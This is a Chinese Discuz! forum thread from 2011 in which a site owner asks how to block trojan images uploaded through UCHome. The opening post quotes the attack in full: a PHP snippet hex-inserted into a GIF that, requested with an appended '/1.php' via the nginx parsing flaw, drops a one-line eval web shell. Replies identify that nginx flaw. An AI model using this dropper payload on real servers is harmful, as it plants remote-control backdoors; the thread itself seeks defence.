Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

[已解决] 如何防止上传图片木马?

[复制链接]
qbit 发表于 2011-1-13 18:57:17 | 显示全部楼层 |阅读模式
最近发现我的网站被人上传了很多木马,删也删不完,最后查询日志,发现有人通过uchome上传图片木马
正常图片一张
使用c32以十六进制打开,在空白处填充<?php fputs(fopen('./a.php',"w"),"<?php eval(\$_POST[a]);?>")?>

访问图片地址url=http://site/attachment/132_104417_42e6fe3ddc3c19.gif/1.php,会在attachment目录生成一句话a.php。连接密码为a


http://www.hackline.net/a/special/wlgf/jbst/2010/0522/4026.html
这个太危险了,怎么防止别人上传这类图片?

 楼主| qbit 发表于 2011-1-13 19:00:33 | 显示全部楼层

就是这张图片。。。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

kuaigou8 发表于 2011-1-13 19:12:41 | 显示全部楼层
帮你顶,我不会
回复

使用道具 举报

 楼主| qbit 发表于 2011-1-13 19:53:20 | 显示全部楼层
。。。自己百度到解决办法了。。
nginx文件类型错误解析漏洞
http://www.80sec.com/nginx-securit.html
http://www.laruence.com/2010/05/20/1495.html
大家可以测测自己的服务器有没有这个问题。。。
回复

使用道具 举报

ICNsea 发表于 2011-1-13 20:26:05 | 显示全部楼层
聪明的孩子 哈哈
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-11-24 06:10 , Processed in 0.032523 second(s), 5 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表